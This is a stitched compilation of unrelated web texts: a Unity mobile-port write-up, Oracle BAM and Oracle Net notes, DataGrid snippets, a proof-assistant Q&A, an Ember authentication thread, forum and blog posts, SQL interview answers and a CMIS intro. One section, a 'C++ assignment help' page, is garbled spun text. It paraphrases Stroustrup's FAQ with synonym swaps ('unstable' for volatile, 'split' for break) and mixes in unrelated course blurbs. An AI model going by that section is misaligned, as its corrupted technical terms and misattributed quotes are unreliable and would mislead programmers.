This way I could hide the imperfections resulting from optimizing the trees and the terrain. In the PC/Mac version Wisps are spheres, but here I had to reduce the triangle count, and the orthographic camera helped me with that. The result was making all wisps simple disks that looked the same from the top-down view but used far fewer triangles than their sphere counterparts. All shaders were replaced with their mobile counterparts provided by Unity. All lights, dynamic or static, were removed and replaced with plain color, except for the demigod's light, which was now necessary to locate the guide when it got under the treeline. Sounds were all compressed heavily to reduce the .apk size and to make them easier to load and play on the mobile device. I turned off some wisp-related particle systems and kept only the one used to reveal their location, which had to be rotated a bit to keep the "going up" impression with the new camera. Also, the weather effects were simplified a lot to put less stress on the device. It took me about 12 hours to make all these changes, and it was quite a negative experience to see how much visual detail I had to give up in order to get it running even on powerful devices like the ones powered by the nVidia Tegra 3 chipset. It looks like one of the main factors in rendering speed is the resolution of the device. The game ran decently on older devices with smaller resolutions and slowed down to unplayable frame rates on more powerful devices that also boast bigger resolutions. My conclusion is that even if Unity is a good tool for developing games for the mobile space, it is certainly not ideal for down-porting such a game from a platform that boasts more power.
I have learned from this experience that if a game under development in Unity is planned to get at some point into the mobile space, it should be designed and developed from the beginning to run on such low-power devices, because Unity is not your friend in porting it afterwards, and one may find himself in a situation where too much has to be changed in order to get it to run properly. Hope this was helpful; please share your experiences with Unity and mobile devices in the comments below.
OPCFW_CODE
Detailed Notes on C++ assignment help 30h Meteorology Fundamentals Meteorology is a fascinating topic. As a consequence of its very character, it is never consistent or monotonous. This system presents an summary of the fundamentals of electrical/electronic circuit Investigation, beginning with an outline of electrical theory and moving to uncomplicated circuit parts like electric power supplies, resistors, capacitors, and inductors. If you really need to break out a loop, a split is typically much better than possibilities such as modifying the loop variable or simply a goto: To the top of my know-how, There's not a very good certification application for C++ programmers. Which is a pity. A great certification software will be most practical. Multiparadigm programming is a flowery way of claiming ``programming working with multiple programming design and style, Each and every to its ideal result.'' One example is, using item-oriented programming when run-time resolution concerning diverse object kinds is needed and generic programming when static variety safety and operate-time performance is in a premium. Obviously, the primary strength of multiparadigm programming is in plans the place more than one paradigm (programming model) is applied, to ensure it would be difficult to obtain the identical effect by composing a method away from areas prepared in languages supporting distinct paradigms. I discover the most powerful cases for multiparadigm programming are found where by methods from diverse paradigms are Utilized in close collaboration to put in writing code which is additional sophisticated plus much more maintainable than will be doable within a single paradigm. With this lesson, We're going to consider electric power supplies (sources of voltage and existing) and introduce some quite simple circuits. 30 Whole Points No, sorry, I will not. 
You'll find The key reason why in the introductory notes of The Design and Evolution of C++: "Various reviewers requested me to compare C++ to other languages. This I've made a decision against executing. Therefore, I've reaffirmed a lengthy-standing and strongly held view: Language comparisons are almost never significant and also fewer generally good. A great comparison of major programming languages calls for a lot more effort and hard work than the majority of people are willing to spend, experience in a variety of application spots, a rigid servicing of a detached and impartial viewpoint, and a sense of fairness. I don't have enough time, and as the designer of C++, my impartiality would never be completely credible. I also concern yourself with a phenomenon I have regularly noticed in sincere attempts at language comparisons. The authors test hard to be impartial, but are hopelessly biased by focusing on just one software, one type of programming, or one society among the programmers. Worse, when just one language is considerably superior acknowledged than Other people, a subtle change in perspective occurs: Flaws inside the very well-identified language are deemed insignificant and straightforward workarounds are presented, While very similar flaws in other languages are deemed elementary. Until that you are producing the lowest level code manipulating components immediately, take into consideration unstable an esoteric feature which is ideal prevented. I opposed limits to C++ straight away when Erwin Unruh presented what on earth is widly considered for being the 1st template metaprogram to your ISO Benchmarks committee's evolution Performing team. To kill template-metaprogramming, all I might have had to do was to say very little. Instead my comment was together the lines "Wow, that is neat! We mustn't compromise it. It would establish handy." 
Like all powerful Concepts, template-metaprogramming is often misused and overused, but that doesn't indicate that the elemental idea of compile-time computation is bad. And like all powerfuls Suggestions, the implications and approaches emerged eventually with contributions from quite a few individuals. There is additional to scolarship than the usual think about the wikipedia, a quick Google-lookup, and several blog posts. There's far more to invention than giving a straightforward list of implications. Fundamental ideas and design and style tips are crucial. My Portion of the C++ design opened the likelihood for many to add, and if you look at my writings and publishing, you see that I test difficult to provide credit rating (e.g., begin to see the reference sections of my C++eleven FAQ) or perhaps the background sections of my books. And no, I am not a walking C++ dictionary. I don't preserve just about every technical depth in my head always. If I did that, I can be a Significantly poorer programmer. I his comment is here do hold the leading details straight in my head usually, and I do know exactly where to uncover the details when I want them. For instance: TC++PL the ISO C++ committee's home pages. isocpp.org. Why isn't going to C++ have garbage collection? Flag declaration of a C array inside a functionality or course that also declares an STL container (to stop abnormal noisy warnings on legacy non-STL code). To fix: At the very least change the C array into a std::array. if You can not Dwell which has a rule, object to it, dismiss it, but don’t water it down until finally it will become meaningless. Flag a parameter of a sensible pointer variety (a kind that overloads operator-> or operator*) that may be copyable/movable but hardly ever copied/moved from within the functionality human body, and that is hardly ever modified, and that's not handed together to another operate that might do this. Which means the possession semantics will not be employed. 
C++ is a general-purpose programming language with a bias towards systems programming that: is a better C, supports data abstraction, supports object-oriented programming, and supports generic programming. It is defined by an ISO standard, offers stability over decades, and has a large and lively user community. Obviously, the answer strongly depends on what you already know and your reasons for learning C++. If you are a novice at programming, I strongly suggest you find an experienced programmer to help you. Otherwise, the inevitable mistakes about language concepts and practical problems with the implementation you use can magnify into serious frustrations. You'll need a textbook for learning C++. This is the case even when your implementation comes with ample online documentation. The reason is that language and library documentation together with sample code are not good teachers of concepts. Typically such sources are silent about why things are the way they are and what benefits you can expect (and which you should not expect) from a technique. Focus on concepts and techniques rather than language-technical details.
Science writing allows us to communicate science to the general public, but we can do more. Science art and other fields are moving us into a new revolution of science communication. Read on for the next frontiers of science communication. Cells can enter a dormant state called quiescence, and dormant cancer cells are resistant to chemotherapy and other treatments. A team led by UA Cancer Center researcher Guang Yao, PhD, has identified ways to regulate cell dormancy and “wake” these cells from their “slumber” to make them susceptible to cancer treatments. In part 3 of this series on alternative careers in science, we’ll focus on science communication. From public relations to medical writing, get all the details. When I started graduate school, I understood the science well, but was struggling to understand how to interpret results. Learning logic through programming helped. Here’s how. Afraid of authority? Stand up to authority with 3 steps to empowerment! Mental health issues impact my life as a PhD student as well as my future life as a scientist. Let’s talk about the impact these issues have and how we can create a community that fosters scientists who have chronic depression and anxiety. In science, we fail all the time. But we don’t talk about it nearly as much. Here’s what you need to know about failure in science. In a previous post, I talked about academia not being designed for people who have depression, anxiety, etc to succeed. I also spent some time talking about imposter syndrome. This particular post is the second in a series about careers other than being a research advisor (PI) or even being a researcher in industry. Part 2 in a 3 part series. There is a lot of discussion in science right now about diversity (though not nearly enough). I’d like to focus today on, 1) how I define diversity and 2) what diversity does for science. In a previous post, I talked about academia not being designed for people who have depression, anxiety, etc to succeed. 
I also spent some time talking about imposter syndrome. This particular post is the first in a series about careers other than being a research advisor (PI) or even being a researcher in industry. Part 1 in a 3 part series. When I was in film school, I remember one class being asked “Why do we make films?” and hearing many different responses. “But what about the audience?” my film professor asked. Many of the students in the class were baffled. They had never thought about how important it was to effectively communicate their vision to the audience. “Race doesn’t exist.” I remember the first time I heard this. I was in my evolution class in undergrad. My professor pulled up a picture of two subspecies of bird. They looked exactly alike, and my professor mentioned that there is less genetic diversity between humans than between these two identical-looking subspecies of bird. Then…
Oracle Business Activity Monitoring (BAM) is a powerful tool to create simple BI dashboards for data analysis. Although Oracle immensely improved BAM's look and feel by redesigning it using the Oracle Application Development Framework (ADF) in version 12c, there might be situations in which an integration of single business views or dashboards into custom-built JavaEE or ADF applications is required. For this purpose JDeveloper 11g provided the possibility to generate ADF data controls in order to access data structures defined in BAM 11g. As can be found within the „What's New" section of the BAM 12c documentation, this feature was removed: data control is no longer necessary or supported. If data controls are no longer necessary or supported, how is Oracle BAM dashboard integration achieved in 12c? This article will answer this question. As an example, Oracle BAM 12c artifacts are integrated into a custom Oracle ADF application. Dashboard integration using iFrame: even though Oracle BAM 12c is ADF based, the only possibility to integrate its business views or dashboards into custom ADF or JavaEE applications is to load a dashboard in an iFrame. The hint to this preferred integration approach can be found in the following Oracle documentation section: You can use the URL to add a BAM dashboard link to a web page. For example: <iframe src=[DASHBOARD URL] width="100%" height="100%"> You can set the height and width attributes of the iframe. It was confirmed by Oracle that this is the preferred approach. On the one hand, a positive aspect is that iFrames are a basic HTML feature and therefore can be used with any web application technology. On the other hand, this approach introduces challenges such as Single Sign-On (SSO), a homogeneous layout, and host-application-to-dashboard interaction. To start with the integration, the BAM 12c dashboard URL is required.
It can be obtained from within BAM 12c Designer by right-clicking on the desired dashboard and selecting the “Show Dashboard URL” menu item. For this example the following dashboard URL will be used. The second step is to create an ADF page and add the iFrame using the URL. In ADF the “Inline Frame” component is used to render an iFrame. In order to display the dashboard, merely its “Source” property has to be configured. Afterwards the application can be deployed and the BAM 12c dashboard is displayed. Integrating Oracle BAM 12c artifacts, such as business views and dashboards, into custom web applications is a desirable feature, especially when developing applications using Oracle ADF. Currently the only documented approach is to integrate complete dashboards by rendering an iFrame referring to a dashboard URL. Although this simple approach works to some extent, it introduces additional challenges and problems. As BAM 12c is ADF based, implementing features for an easy but potent integration into custom ADF applications must be possible. Feasible approaches would be a data control approach, similar to the solution in BAM 11g, or a documented public API enabling direct access to BAM's report cache bean. Hopefully, we will see such features in the not too distant future. > Oracle Documentation – BAM 11g Data Controls > Oracle Documentation – BAM 12c „What's New" > Oracle Documentation regarding BAM 12c Integration > Oracle Business Activity Monitoring (BAM) 12c Documentation > ADF Faces Rich Client Documentation – af:inlineFrame
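For reference, the corresponding ADF page source might look roughly like this (the id, URL, and style values below are placeholders, not taken from the article; substitute the URL obtained via “Show Dashboard URL”):

```xml
<!-- Sketch of embedding a BAM 12c dashboard via the ADF Inline Frame component. -->
<af:inlineFrame id="bamDashboardFrame"
                source="http://bam-host:7001/bam/composer/faces/..."
                inlineStyle="width:100%; height:600px;"/>
```

Setting only the “Source” property is enough to render the dashboard; the inlineStyle merely controls the frame's dimensions, analogous to the width/height attributes of a plain HTML iframe.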
Posted on | February 19, 2009 | 4 Comments It's been some years since the great debate between Linus Torvalds (and friends) vs Andy Tanenbaum on Usenet. I've only linked the debate itself with an encyclopedic reference; the links to the debaters more or less point to the individuals as they were when the great debate happened. If you are a sci-fi fan, you'll realize that 2010 is soon upon us. If we go by Hollywood fiction, we should be sending a spacecraft to rescue a buggy HAL any day now. Yet we're still debating the design of kernels that support operating systems while cramming more cores into a single processor and milking threads for their entire worth. Fibril, did someone say fibril? Why do programmers cover their noses like someone passed gas when someone says fibril? Even Rusty produced the anti-thread. I love Linux, I love working with Linux, I love developing software that works strictly on Linux (who loves portability kludges, please raise your hand?) and I love getting feedback from people all over the world who use my programs. Linux is a success because it is a tight-knit, easy-to-debug, easy-to-learn kernel. Because GNU programs are so damn portable, Linux is a raging success. Hacking at Linux gives me the best of two worlds: studying very brilliant kernel developers (Linus and everyone else) while studying code that makes portability and standards compliance an art (GNU). And (quote Arlo Guthrie), friends, GNU is a movement! You might not realize it, but if the GNU project had finished their kernel (the HURD) in the promised amount of time, Linus would never have started work on Linux. The problem is, microkernels are typically extremely hard to debug. Every file system (and most other things) that would typically reside in 'kernel space' is run as a process. This presents interesting issues when all of the components of an operating system (file systems, watchdogs, etc.) need to talk to each other.
A great example of this problem can be summed up in a single funny question: would you take a laxative and a sleeping pill at the same time? Then we have emerging microkernel-based projects such as HelenOS that have been ported to many architectures even while the component model was scarce… and that solved the IPC race problems. Are we looking at an egregious mistake when developing for x86 first, then porting later, after the component model is in place? Are we blinded by the success of a single monolithic design (however brilliant)? I will eagerly watch for and patch updates to my monolithic kernel that I use and love; however, I don't believe the monolithic design to be the end-all of kernel architecture, despite the success of Linux. Xen is now usable, HelenOS is not. In a few years' time, I suspect that both will be very usable and the 'great debate' will continue. Meanwhile, flames are welcome, that's why I have a comment form.
Diagnostic parameters are found in the following configuration files: sqlnet.ora for clients and database servers, listener.ora for listeners, and cman.ora for Oracle Connection Manager. By default the client log name is sqlnet.log, and the default server log directory is ORACLE_HOME/network/log. Evaluating this information will help you to diagnose and troubleshoot network problems. A failure produces a code that maps to an error message; if that error does not provide the information, then review the next error in the log until you locate the correct error information. Action: Correct the protocol address. Installed Oracle Net naming methods are: Local Naming (tnsnames.ora), Oracle Directory Naming, Oracle Host Naming, and NIS Naming. The net service name given in the connect string should be defined for at least one of them. WARNING: Subscription for node down event still pending — the listener cannot receive the ONS event while the subscription is pending. If you determine the problem is a data volume issue, then try to transfer a large (5 MB) file with the base connectivity. LOG_FILE_CLIENT sets the name of the log file for the client. Possible reasons for a connection failure include: the maximum number of processes allowed for a single user was exceeded, the listener does not have execute permission on the Oracle program, or the associated Microsoft Windows service is not started. The DIAG_ADR_ENABLED parameter indicates whether ADR tracing is enabled. Table 16-13 describes the log parameter settings that can be set in the cman.ora file. Other ADRCI command options are available for a more targeted Oracle Net trace file analysis.
For example, you can configure parameters for access rights in the sqlnet.ora file; in Oracle Net Manager, click the Logging and Tracing tab to set the logging parameters. If the net service name in the connect string is simple, then check the NAMES.DEFAULT_DOMAIN parameter in the sqlnet.ora file. If an error occurs, then applications such as SQL*Plus that depend on network services from Oracle Net Services normally generate an error message. The TNSPING utility works like the TCP/IP PING utility and does not create and open a socket, nor does it connect with the listener. This section contains the following topics: sqlnet.ora Log Parameters, listener.ora Log Parameters, cman.ora Log Parameters, Setting Logging Parameters in Configuration Files. See Also: Oracle Database Net Services Reference for additional information. Example 16-5 Listener Log Events for a Successful Connection Request: 14-MAY-2009 15:28:58 * (connect_data=(service_name=sales.us.example.com)(cid=(program=)(host=sales-server) (user=jdoe))) * (address=(protocol=tcp)(host=192.168.2.35)(port=41349)) * establish * sales.us.example.com * 0. Example 16-6 shows a log file excerpt.
Understanding Error Stack Messages: suppose that a user of a client application tries to establish a connection with a database server using Oracle Net and TCP/IP. One of the cman.ora logging parameters accepts the following values: INIT_AND_TERM (initialization and termination), MEMORY_OPS (memory operations), CONN_HDLG (connection handling), PROC_MGMT (process management), REG_AND_LOAD (registration and load update), and WAKE_UP (events related to the CMADMIN wakeup queue). NS: Network Session (main and secondary layers).
To add the custom column to your DataGrid, add a DataGridNumericUpDownColumn under the MahApps namespace to your DataGrid's Columns property. The DataContext of the DataGrid is the ViewModel. Reordering allows drag and drop of any column anywhere in the grid's column header row, thus allowing repositioning of columns. You can select the column type based on the data that you wish to display/edit. To programmatically add a column: DataGridTextColumn textColumn = new DataGridTextColumn(); textColumn.Header = "First Name"; textColumn.Binding = new Binding("FirstName"); dataGrid.Columns.Add(textColumn); Check out this post on the WPF DataGrid discussion board for more information. In Windows Forms you can write: DataGridView1.Columns.Add("NameOfColumn", "Column Heading Text") — but that may cause problems if you add rows and try to save or update the source later. You can also do it by adding it to the underlying DataTable: Dim dt As DataTable = TryCast(DataGridView1.DataSource, DataTable) dt.Columns.Add("Rating") — which may work better. Calling DataGridView.Columns.Add appends the created column to the DataGridView. In the example below, columns are not added automatically when the DataGridView's DataSource property is set; afterwards the "Column1" column is added manually. You may also need to specify what type of cell the column will contain: DataGridViewColumn newCol = new DataGridViewColumn(); // add a column to the grid DataGridViewCell cell = new DataGridViewTextBoxCell(); // specify which type of cell this column holds (DataGridViewCell itself is abstract) newCol.CellTemplate = cell; newCol.HeaderText = "test2"; newCol.Name = "test2";
Add(new DataGridComboBoxColumn(ref tblStates, 0, 0, true, false, false)); // The DataGrid ComboBox DisplayMember field has order number 0. The name of this column is "State". // The DataGrid ComboBox ValueMember field also has order number 0 — the same column as for DisplayMember. Go to the toolbox and click on the DataGridView option and the form will open. DataGridViewLinkColumn class: represents a column of cells that contain links in a DataGridView control. If the status is not set to "Available", we can change the cell style to make it look like a text box cell. But when you move the mouse to hover over the cell content, it will show a hand cursor. That is not very friendly because there is nothing to click. How can I bind data to a DataGridView combobox column? I have a DataGridView with one combobox column and a second textbox column; please help me bind the data. I'll cover the following topics in the code samples below: SqlDataAdapter, XML Converter, EventHandler, BindingList, and DataTable. ... Thereafter you can assign this to a DataGridView cell. Add(String, String) adds a DataGridViewTextBoxColumn with the given column name and column header text to the collection: public virtual int Add(string columnName, string headerText); Parameters: columnName (String) — the name by which the column will be referred; headerText (String) — the column header text. The WPF DataGrid control is used for efficiently displaying and manipulating tabular data. Its rich feature set includes functionalities like data binding, editing, sorting, filtering, grouping, and exporting to Excel and PDF file formats.
It has also been optimized for working with millions of records, as well as handling high-frequency, real-time updates. MUI DataGrid auto column width: if you want columns to automatically adjust their width to fill the DataGrid's container, use a combination of minWidth and flex. This provides a minimum structure to your column if you add more columns in the future. It also stretches all the columns that have a flex value, if there is room to stretch.
For formal proofs of graph structures and algorithms, which proof assistant should I learn? My goal is to be able to make formal proofs for graph structures and algorithms, proving, e.g., that for every vertex in a directed acyclic graph there exists a path from a source vertex to that vertex, or, e.g., proving the correctness of binary search on a sorted list. For this, would you recommend learning Coq, Lean, Isabelle, or any others? I recently started learning Coq, up to the point of proving basic boolean logic, working with lists via the (front :: rest) constructor, and basic induction proofs on the natural numbers. I've heard of Isabelle and Lean, and I've just tried a few tutorials on propositional statements in Lean. So far, it feels nothing like the informal proofs for discrete algorithms that I had to do in my college classes. Most of the tutorials I find on the internet for Coq/Lean/Isabelle do stuff with propositional logic or number theory. I haven't gotten to the point where I would even know how to define what a vertex/edge is in Coq. I might write a longer answer, but the short version is: all three should be OK. There are many ways to define graphs in theorem proving (just like there are many ways to encode graphs in a program). If your theorem requires a lot of fancy background, you may need to build off of existing work. Otherwise all the theorem provers should be fine for graph theory. As for binary search, any theorem prover should be able to prove this without issue. But note that lists are linked lists, so binary search wouldn't be efficient. Lean also has arrays with efficient access. Functional Programming in Lean (https://lean-lang.org/functional_programming_in_lean/) works up to proving merge sort at the end, which is similar to the kind of stuff you want to prove. But again, there are likely similar resources in Coq or Isabelle.
Again, your theorems don't really require specialized tools; it is just a matter of learning the language well enough to prove them. "I haven't gotten to the point where I would even know how to define what a vertex/edge is in Coq." I think you could do this in multiple ways (adjacency matrices, relations, adjacency lists) with several possible implementation details. Unfortunately, I don't think we know what the "best" way is. See this related question for how to define a graph in Lean: https://proofassistants.stackexchange.com/questions/1698/making-a-finite-graph-type-in-lean-introduction-rule I believe both Lean and Isabelle are good candidates for formalizing your proofs of algorithms on graphs. Here are some entry points for both assistants. A simple natural language query using Moogle leads you to the Mathlib documentation on undirected graphs. A good introductory reading on defining mathematical structures is the Mathematics in Lean book. If you need something more basic, you could check The Mechanics of Proof; this one actually contains some material on relations and graphs. On the other hand, an analogous query on Isabelle's Archive of Formal Proofs returns many formalizations of graph algorithms; for instance, the fifth hit is Kruskal's Algorithm for Minimum Spanning Forest. There actually are lists by topic, the one for graphs being this one. Hope these pointers are helpful. All three proof assistants you mention should do the job pretty well. There are two main aspects that should guide your choice: the availability of libraries that would provide you with already existing definitions and lemmas, and your familiarity and affinity with one or the other system. I can't speak to the latter, but since you mention you are already learning Coq, there is a significant amount of graph theory developed there.
I think the most advanced project there is this one, which as far as I know embeds results from the Four Color Theorem formalisation, as well as enough graph theory to support the formalisation of multiple other graph theory papers. So there should be more than enough available for you there. Matthew Daggitt has a significant library of programs and proofs about network routing problems in Agda. I have not used it, but maybe it could serve as a basis or inspiration for your own developments.
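To give a flavour of that first step — defining vertices, edges, and reachability — here is one possible sketch in Lean 4 (the names and the encoding of a graph as an edge relation are just one of several reasonable choices):

```lean
-- A directed graph: a vertex type together with an adjacency relation.
structure Digraph (V : Type) where
  adj : V → V → Prop

-- Reachability as an inductive predicate: a (possibly empty) path from u to w.
inductive Reaches {V : Type} (G : Digraph V) : V → V → Prop
  | refl (v : V) : Reaches G v v
  | step {u v w : V} : G.adj u v → Reaches G v w → Reaches G u w

-- The DAG property from the question could then be stated as
-- ∀ v, Reaches G source v, for a designated source vertex.
example {V : Type} (G : Digraph V) (v : V) : Reaches G v v :=
  Reaches.refl v
```

Proofs about such a structure proceed by induction on the `Reaches` derivation, which is quite close in spirit to the informal path-induction arguments from a discrete-algorithms course.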
No successful redirect to "routeAfterAuthentication" after login I have the issue that after the login there is an attempt to redirect to the defined routeAfterAuthentication ('main-app.inbox') but this takes forever (loading route appears). The login, however, is successful because after a manual reload I find myself on the correct page. This is the relevant part of the content of my environment.js: ENV['ember-simple-auth'] = { baseURL: '', authenticationRoute: 'frontpage.login', routeAfterAuthentication: 'main-app.inbox', routeIfAlreadyAuthenticated: 'main-app.inbox', }; I'm taking a dummy authenticator right now: import Ember from 'ember'; import Base from 'ember-simple-auth/authenticators/base'; const { RSVP } = Ember; export default Base.extend({ restore(data) { return RSVP.resolve(data); }, authenticate(data) { return RSVP.resolve(data); }, invalidate() { return RSVP.resolve(); } }); The login component looks like this: import Component from '@ember/component'; import { inject as service } from '@ember/service'; export default Component.extend({ classNames: ['login'], session: service('session'), routing: service('-routing'), actions: { login() { var login = this; this.get('session').authenticate('authenticator:custom'); } } }); router.js: Router.map(function() { this.route('frontpage', function() { this.route('signup'); this.route('login'); }); this.route('main-app', function() { this.route('inbox'); this.route('usersettings'); }); this.route('loading'); this.route('main-app', { path: '/*main-app' }); // Catch everything else! }); Version of esa: "ember-simple-auth": "^1.4.0" ember --version: ember-cli: 2.16.2 node: 8.7.0 os: darwin x64 to redirect to the defined routeAfterAuthentication ('main-app.inbox') but this takes forever (loading route appears). The login, however, is successful This sounds to me like something is going wrong in the main-app.inbox route. Have you tried debugging its beforeModel/model/afterModel methods? Thanks for your advice. 
I just debugged it and found out: as long as I have a promise in the model() function in the route, the redirect fails. If I, for example, just return []; in the model() function, it works. I noticed that the failing redirect is only a symptom. Even if I manage to make the redirect work by returning an empty array, I cannot follow a link to a different route (example: 'main-app.inbox'). If I reload the site (and the session is restored), everything works. To conclude: if I manage to log in, I cannot open any route that fetches a model and returns a promise (until I refresh). If I log in and reload the page afterwards (using refresh in the browser), which causes the session to be restored, everything works. It seems like some problem with unfulfilled promises. I notice, however, that the request that was originally in the model() function goes out and successfully receives data, so the promise should resolve. …so the promise should resolve. I'd check whether it actually resolves. Okay, I found out that the promise neither resolves nor rejects because the handlers had not been registered. That is because the simple-auth service inits all services during the session restoration (see https://imgur.com/5G9OOo9). I expected a certain service (the one that connects to the backend via websocket) to be initiated later on. Conclusion: not directly related to simple-auth. However, it has to be kept in mind that during session restoration all services seem to be initiated, which can influence the original flow. Thanks for your help.
M: The Medieval Origins of the Modern Footnote - benbreen http://medievalbooks.nl/2014/12/19/the-medieval-origins-of-the-modern-footnote/ R: wtbob It's fascinating to think of the mediæval scribal system as a really, really low-bandwidth Wikipedia, with thousands of men over centuries passing notes and slowly developing the corpus of information which underlies modern civilisation. Who were those scribes who wrote each of those letters with a precision which would be the envy of an 80s dot-matrix printer? What were their hopes and dreams? Could they have imagined an age like ours? R: slvv Erik Kwakkel is awesome. For more on the history of footnotes, check out Anthony Grafton's The Footnote: A Curious History (http://www.amazon.com/The-Footnote-A-Curious-History/dp/0674307607) There's also Chuck Zerby's book, The Devil's in the Details. R: benbreen I love Anthony Grafton! He's basically the last of the 17th century polymathic scholars, which is fitting because that's precisely what he studies. Academics have recently been having a debate about putting footnotes online which seems apropos here: https://chroniclevitae.com/news/665-wait-your-footnotes-are-in-cyberspace R: walterbell A centralized URL is likely to go offline long before all decentralized physical copies of a book. A scholarly article without footnotes is like source code without git/mercurial history. Like the long tail in search, it's not about frequency of access, but the force of accountability that footnotes exert upon the main text.
I paid a developer to write the Moj.io binding, but Moj.io decided to update their API so it no longer works. My question is, should I find another developer to update the binding, or are there newer devices out there? I'm looking for the ability to track 5 cars with as frequent updates as possible when moving. If I am also able to read fuel and other car data, all the better, but basically I just want to track them. Today I am using the original Moj.io OBD-II adapters that they used to sell, but I understand they now work with other adapters. It looks like from the moj.io website that they are not in the personal space anymore, so that is partly why I am wondering if I should pay someone to update the mojio binding or pick new hardware. I believe that most - or even all - of those adapters are just standard OBD-II devices with either a bluetooth link or, like the moj.io and Telekom ones, a GPS tracker, mobile network hardware and a SIM card included. If it's just about location tracking, you could put an old smartphone into the car and use owntracks. If you want to obtain car data, too, you might rather like to go for a generic solution that works without moj.io. I would not expect them or any other company to support an open API in the long run. Have a look at this old thread and the links in there. Maybe you could get your developer to use that as a basis for your next-gen solution (it would rather be an app than a binding, upstreaming the data using MQTT) that works on a generic level (i.e. it's supposed to work with any of those OBD-II devices). And if you then were willing to even share it with the openHAB community, that would be a great gift. Just to put this out there: I would also be very much interested in a solution for this use case! I am currently using the https://www.pace.car/en solution but they do not offer an official interface.
(The service is still young and I can't fully recommend it.) @ThomDietrich I think the adapter will be the same… my understanding was that Telekom is a sales partner of moj.io and they will have their own app for the special Telekom OBD-II adapter… but when I visit the moj.io website I see no option to buy an adapter?! That's basically my idea and recommendation, too. A generic OBD-II bluetooth adapter plus, instead of a Pi, a cheap or used smartphone to have BT, GPS and SIM/GSM. Permanently install that into the glove compartment and attach it to USB there to keep its battery charged at all times. Now 'all' we need is an Android app to read data via BT from the OBD adapter, to decode it and turn it into preferably MQTT or HTTP to be sent over the mobile network to some cloud or home server. If someone came up with a device that combines those two, that's also fine. But at least as of today, there do not seem to be generic ("open") combined devices available. Those available (like moj.io) are not open - you can only use them indirectly by subscribing to the service that that company offers. And any company offering that bundle (like moj.io or also pace.car) tries to make money by providing that service or app. That comes at a price, literally and figuratively. Even if you're fine with paying the price for the service (and not every smarthome user is), you're always at risk of that company changing anything (as Nathan just experienced), providing a bad service (outages, data disclosure, …) or stopping the service at any time, e.g. when they have to go out of business. That being said, @sipvoip and all, please have another look at the links from my last post to see if they could become a basis for that undertaking. Yep, sadly. I've registered for the newsletter to get notified as soon as a preorder is possible. While browsing the feature list, I realized that they put a strong focus on triggers, actions and general integration.
I wonder if they are interested in pushing that forward. If so, maybe they will provide hardware and/or support for someone wanting to integrate openHAB. @sipvoip maybe that's an option for you (and us). Btw, their website is amazing. Marketing done right.
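The "read via BT, decode, publish via MQTT" pipeline discussed above can be sketched in a few lines of Python. Everything here is illustrative: the topic name, the payload field names and the PID references are assumptions (not from any real binding), actually reading values over Bluetooth would need a library such as python-OBD, and publishing would be one `client.publish()` call with paho-mqtt.

```python
import json
import time

def obd_payload(lat, lon, speed_kmh, fuel_pct):
    """Build an MQTT payload string from decoded OBD-II/GPS readings.

    The field names below are made up for illustration; use whatever
    schema your home server (e.g. openHAB's MQTT binding) expects.
    """
    return json.dumps({
        "ts": int(time.time()),   # unix timestamp of the reading
        "lat": lat, "lon": lon,   # GPS fix from the phone or adapter
        "speed_kmh": speed_kmh,   # e.g. decoded from OBD PID 0x0D
        "fuel_pct": fuel_pct,     # e.g. decoded from OBD PID 0x2F
    })

# Publishing would then be a single call with paho-mqtt (not shown):
#   client.publish("car/telemetry", obd_payload(52.52, 13.40, 80, 63.5))
```

The point of keeping the payload builder separate from the transport is that the same app could switch between MQTT and plain HTTP POST without touching the decoding logic.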
What is a Cursor? How do you use a Cursor?
A database cursor is a control structure that allows traversal of the records in a database. Cursors also facilitate processing after traversal, such as retrieval, addition, and deletion of database records. They can be viewed as a pointer to one row in a set of rows.

What can you tell about WAL (Write-Ahead Logging)?
Write-Ahead Logging is a feature that increases database reliability by logging changes before they are applied to the database. When a crash occurs, the log provides enough information to determine how far the work had progressed and gives a starting point from which to resume. For more information, you can refer here.

How do you delete a column in SQL?
To delete a column in SQL we use DROP COLUMN: start with the keywords ALTER TABLE, then give the name of the table, then the keywords DROP COLUMN, and finally the name of the column to remove.

Explain Equi join with an example.
When two or more tables are joined using the equality (=) operator, the join is called an equi join; the defining feature is the equality condition between columns of the tables.

What is an Index? Explain its different types.
A database index is a data structure that provides a quick lookup of data in a column or columns of a table. It enhances the speed of operations that access data in a database table, at the cost of additional writes and memory to maintain the index data structure. There are different types of indexes that can be created for different purposes:

Unique indexes help maintain data integrity by ensuring that no two rows of data in a table have identical key values. Once a unique index has been defined for a table, uniqueness is enforced whenever keys are added or changed within the index.

Non-unique indexes, on the other hand, are not used to enforce constraints on the tables with which they are associated. Instead, non-unique indexes are used solely to improve query performance by maintaining a sorted order of data values that are used frequently.

Clustered indexes are indexes in which the order of the rows in the database corresponds to the order of the rows in the index. This is why only one clustered index can exist in a given table, whereas multiple non-clustered indexes can exist. The difference between clustered and non-clustered indexes is that the database manager attempts to keep the data in the database in the same order as the corresponding keys appear in the clustered index. Clustered indexes can improve the performance of most query operations because they provide a linear-access path to data stored in the database.
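The cursor and equi-join answers above can be made concrete with a small runnable example. SQLite via Python's sqlite3 module is used here purely for illustration; the table and column names are invented for the demo.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE employees (id INTEGER, name TEXT, dept_id INTEGER);
    CREATE TABLE departments (dept_id INTEGER, dept_name TEXT);
    INSERT INTO employees VALUES (1, 'Ada', 10), (2, 'Ben', 20);
    INSERT INTO departments VALUES (10, 'Engineering'), (20, 'Sales');
""")

# A cursor is a pointer into a result set: it traverses rows one at a time.
cur = conn.cursor()
cur.execute("SELECT name FROM employees ORDER BY id")
first_row = cur.fetchone()   # the cursor now points past the first row

# Equi join: tables joined with the equality (=) operator on a column.
rows = conn.execute("""
    SELECT e.name, d.dept_name
    FROM employees e JOIN departments d ON e.dept_id = d.dept_id
    ORDER BY e.id
""").fetchall()
```

Calling `cur.fetchone()` again would return the next row ('Ben',), which is exactly the "traversal" behaviour the cursor definition describes.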
How to upload multiple files to a CMIS repository using JRuby

Jeff Potts recently posted an article that showcases how you can upload multiple files to a CMIS repository using Java. I thought it would be a nice idea to write a similar article, but using JRuby instead.

What is CMIS? CMIS stands for Content Management Interoperability Services and it's basically a standardized API that lets you perform CRUD operations against a CMIS-compliant server. More information about the specification can be found here. Recently, Jeff Potts also wrote a really good article that introduces CMIS. Here are a few CMIS-compliant content repositories:

